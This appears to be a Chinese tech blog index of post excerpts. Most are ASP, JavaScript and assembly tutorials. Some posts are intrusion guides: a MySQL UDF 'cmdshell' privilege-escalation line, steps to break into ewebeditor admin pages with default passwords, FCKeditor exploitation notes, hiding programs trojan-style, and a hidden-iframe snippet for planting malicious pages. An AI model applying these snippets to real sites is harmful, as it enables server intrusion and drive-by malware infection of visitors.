预览模式: 普通 | 列表
QTICK是一个专业的在线调查服务网站,您可以在这里发表您的意见和见解,
您还可以得到积分奖励和抽奖机会,我们真诚期待着您的加入!
点击以下链接,马上加入(如果无法点击,请复制完整链接到浏览器地址栏,回车访问即可!)
http://www.QTick.com/JoinPanelist.aspx?ID=1757706

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 5143

mysql提权总结方法四则

一 UDF提权   

这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:   

create function cmdshell returns string soname ’udf.dll’    

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 4980

ewebeditor漏洞利用总结

    先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:
1、首先访问默认管理页看是否存在。
        默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)
2、默认管理帐号密码!
        默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8212

Fckeditor漏洞利用总结

 查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5323

内核中API与进程、线程和模块的监测

内核中API与进程、线程和模块的监测


内核中进程、线程和模块的监测API

查看更多...

分类:内核探究 | 固定链接 | 评论: 0 | 查看次数: 6996

用VB实现“木马”式隐形运行程序

在一些系统,为了特定目的,经常要求程序隐藏起来运行,例如DCS(集散控制系统)中的后台监控系统、木马控制程序、源码防拷贝等,以减少被发现、截杀和反汇编的风险。这种功能模块要求程序在运行期间不仅不会在桌面出现,也不允许被操作者从任务管理器列表中发现。 

程序隐形的原理 

   对于一个隐形程序而言,最基本的要求是: 

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 5486

很短的汇编语言教程

对初学者而言,汇编的许多命令太复杂,往往学习很长时间也写不出一个漂漂亮亮的程序,以致妨碍了我们学习汇编的兴趣,不少人就此放弃。所以我个人看法学汇编,不一定要写程序,写程序确实不是汇编的强项,大家不妨玩玩DEBUG,有时CRACK出一个小软件比完成一个程序更有成就感(就像学电脑先玩游戏一样)。某些高深的指令事实上只对有经验的汇编程序员有用,对我们而言,太过高深了。为了使学习汇编语言有个好的开始,你必须要先排除那些华丽复杂的命令,将注意力集中在最重要的几个指令上(CMP LOOP MOV JNZ……)。但是想在啰里吧嗦的教科书中完成上述目标,谈何容易,所以本人整理了这篇超浓缩(用WINZIP、WINRAR…依次压迫,嘿嘿!)教程。大言不惭的说,看通本文,你完全可以“不经意”间在前辈或是后生卖弄一下DEBUG,很有成就感的,试试看!那么――这个接下来呢?―― Here we go!(阅读时看不懂不要紧,下文必有分解) 
  因为汇编是通过CPU和内存跟硬件对话的,所以我们不得不先了解一下CPU和内存:(关于数的进制问题在此不提) 
  CPU是可以执行电脑所有算术╱逻辑运算与基本 I/O 控制功能的一块芯片。一种汇编语言只能用于特定的CPU。也就是说,不同的CPU其汇编语言的指令语法亦不相同。个人电脑由1981年推出至今,其CPU发展过程为:8086→80286→80386→80486→PENTIUM →……,还有AMD、CYRIX等旁支。后面兼容前面CPU的功能,只不过多了些指令(如多能奔腾的MMX指令集)、增大了寄存器(如386的32位EAX)、增多了寄存器(如486的FS)。为确保汇编程序可以适用于各种机型,所以推荐使用8086汇编语言,其兼容性最佳。本文所提均为8086汇编语言。寄存器(Register)是CPU内部的元件,所以在寄存器之间的数据传送非常快。用途:1.可将寄存器内的数据执行算术及逻辑运算。2.存于寄存器内的地址可用来指向内存的某个位置,即寻址。3.可以用来读写数据到电脑的周边设备。8086 有8个8位数据寄存器,这些8位寄存器可分别组成16位寄存器:AH&AL=AX:累加寄存器,常用于运算;BH&BL=BX:基址寄存器,常用于地址索引;CH&CL=CX:计数寄存器,常用于计数;DH&DL=DX:数据寄存器,常用于数据传递。为了运用所有的内存空间,8086设定了四个段寄存器,专门用来保存段地址:CS(Code Segment):代码段寄存器;DS(Data Segment):数据段寄存器;SS(Stack Segment):堆栈段寄存器;ES(Extra Segment):附加段寄存器。当一个程序要执行时,就要决定程序代码、数据和堆栈各要用到内存的哪些位置,通过设定段寄存器 CS,DS,SS 来指向这些起始位置。通常是将DS固定,而根据需要修改CS。所以,程序可以在可寻址空间小于64K的情况下被写成任意大小。 所以,程序和其数据组合起来的大小,限制在DS 所指的64K内,这就是COM文件不得大于64K的原因。8086以内存做为战场,用寄存器做为军事基地,以加速工作。除了前面所提的寄存器外,还有一些特殊功能的寄存器:IP(Intruction Pointer):指令指针寄存器,与CS配合使用,可跟踪程序的执行过程;SP(Stack Pointer):堆栈指针,与SS配合使用,可指向目前的堆栈位置。BP(Base Pointer):基址指针寄存器,可用作SS的一个相对基址位置;SI(Source Index):源变址寄存器可用来存放相对于DS段之源变址指针;DI(Destination Index):目的变址寄存器,可用来存放相对于 ES 段之目的变址指针。还有一个标志寄存器FR(Flag Register),有九个有意义的标志,将在下文用到时详细说明。 
  内存是电脑运作中的关键部分,也是电脑在工作中储存信息的地方。内存组织有许多可存放数值的储存位置,叫“地址”。8086地址总线有20位,所以CPU拥有达1M的寻址空间,这也是DOS的有效控制范围,而8086能做的运算仅限于处理16位数据,即只有0到64K,所以,必须用分段寻址才能控制整个内存地址。完整的20位地址可分成两部份:1.段基址(Segment):16位二进制数后面加上四个二进制0,即一个16进制0,变成20位二进制数,可设定1M中任何一个64K段,通常记做16位二进制数;2.偏移量(Offset):直接使用16位二进制数,指向段基址中的任何一个地址。如:2222(段基址):3333(偏移量),其实际的20位地址值为:25553。除了上述营养要充分吸收外,你还要知道什么是DOS、BIOS功能调用,简单的说,功能调用类似于WIN95 API,相当于子程序。汇编写程序已经够要命了,如果不用MS、IBM的子程序,这日子真是没法过了(关于功能调用详见《电脑爱好者》98年11期)。 
  编写汇编语言有两种主要的方法:1.使用MASM或TASM等编译器;2.使用除错程序DEBUG.COM。DEBUG其实并不能算是一个编译器,它的主要用途在于除错,即修正汇编程序中的错误。不过,也可以用来写短的汇编程序,尤其对初学者而言,DEBUG 更是最佳的入门工具。因为DEBUG操作容易:只要键入DEBUG回车,A回车即可进行汇编,过程简单,而使用编译器时,必须用到文本编辑器、编译器本身、LINK以及EXE2BIN等程序,其中每一个程序都必须用到一系列相当复杂的命令才能工作,而且用编译器处理源程序,必须加入许多与指令语句无关的指示性语句,以供编译器识别,使用 DEBUG 可以避免一开始就碰到许多难以理解的程序行。DEBUG 除了能够汇编程序之外,还可用来检查和修改内存位置、载入储存和执行程序、以及检查和修改寄存器,换句话说,DEBUG是为了让我们接触硬件而设计的。(8086常用指令用法将在每个汇编程序中讲解,限于篇幅,不可能将所有指令列出)。 

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 5404

regsvr32

   regsvr32 [/n] [/i[:cmdline]] dllname
    /u  解除服务器注册
   /s  无声;不显示消息框
   /i   调用DllInstall,给其传递一个可选[cmdline];跟/u一起使用时,卸载dll
    /n   不要调用DllRegisterServer;这个选项必须跟/i一起使用

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 4952

ASP:6行代码实现无组件上传

我花了一个晚上时间研究了一下ADODB.Stream,并且用了6行代码实现了无组件上传:  

  strFileName=Request.QueryString("file1")

  SetobjStream=Server.CreateObject("ADODB.Stream")

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 6774

adodb Stream 周详用法-ASP教程,ASP应用

组件:"adodb.stream"
有下列方法:
cancel 方法
     使用方法如下
     object.cancel

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 6123
1.浏览器已知类型,如Avi,Doc等如果本地安装了关联程序就会自动在浏览器上打开
2.权限管理,有时候不是所有的人都允许下载,所以需要在下载的时候进行判断
3.经常需要将特殊文件搁到虚拟目录访问不到的地方,以及asp和asa等文件的下载

大家经常用的是Adodb.Stream,但这时就有个缺陷,就是不支持断点续传了。

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 6518

js定时器

在javascritp中,有两个关于定时器的专用函数,它们是: 
1.倒计定时器:timename=setTimeout("function();",delaytime); 

2.循环定时器:timename=setInterval("function();",delaytime); 
  function()是定时器触发时要执行的是事件的函数,可以是一个函数,也可以是几个函数,或者javascript的语句也可以,单要用;隔开;delaytime则是间隔的时间,以毫秒为单位。 

查看更多...

Tags: 脚本 代码

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 8395

HTML 鼠标事件

onabort 当用户中断下载图像时触发。

onactivate 当对象设置为活动元素时触发。

onafterprint 对象所关联的文档打印或打印预览后立即在对象上触发。

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 8166

用JS改变文字大小的特效

改变文字大小的JS   适合用于在 (HTM)中.

<script language="JavaScript">

function doZoom(size)

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 6833

详细的关于ASP缓存类的教程 4

Public Property Let Value(ByVal vNewValue) '读取和写入缓存数据
If LocalCacheName<>"" Then 
CacheData=Application(CacheName&"_"&LocalCacheName) 
If IsArray(CacheData) Then 
CacheData(0)=vNewValue 

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 6139

详细的关于ASP缓存类的教程 3

  很简单把,其实就是用了很简单的Application技术,而且就一句话的不同: 
  Application("BooksListBox") = BooksListBox 
  你可以验证一下你就会发现服务器上的请求数量会降低不少的。这种情况尤其适合与那些更新不是很频繁的网站内容,例如你一天(或则很长时间)只更新一次。 

  下面再讨论一种客户端的缓存技术这种技术也叫断开连接的ADO连接技术(翻译水平太次,听上去怎么这么别扭)。这种技术主要使用在用来保存用户个人信息,例如用户的密码,代号等等上面。它主要使用了ADO的一些属性。同时也回答了一些网友曾经提到过的能否在Applocation中使用ADO对象的问题。解释不清楚,下面让代码来发言: 

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 7247

详细的关于ASP缓存类的教程 2

四、实例分析

  假设一个建议论坛的原有布局如下:

根目录下:

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 4275

详细的关于ASP缓存类的教程 1

一、何谓ASP缓存/为什么要缓存

  当你的web站点采用asp技术建立的初期,可能感觉到的是asp动态网页技术带来的便利性,以及随意修改性、自如的http控制。但是,随着访问量的增加,你一定会发现自己的站点访问速度越来越慢,IIS重新启动得越来越频繁。接下来,你一定想优化asp,诸如更换性能更优异的数据库、建立索引、编写存储过程等等。这些措施有些不需要增加成本压力,有些则成本压力很大(譬如丛Access到SQL),而且效果还不一定。

  面对web访问压力,我认为最经济的办法是利用缓存优化技术来实现缓解web的服务压力。

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 4166

ASP随机数

函数RND()是一个非常重要的函数。如果你想建立一个随机的问候语,一个日期的随机提示,或者甚至一个游戏,你将要使用这个函数。

函数RND()返回一个0到1之间的随机数。这里有这个函数的一个例子及其可能的返回值:

<%=RND()%>

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 4998

常用挂马代码大全

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 4929
博主QQ: 友情链接请找我
QQ群: 灰色档案
返回顶部 关闭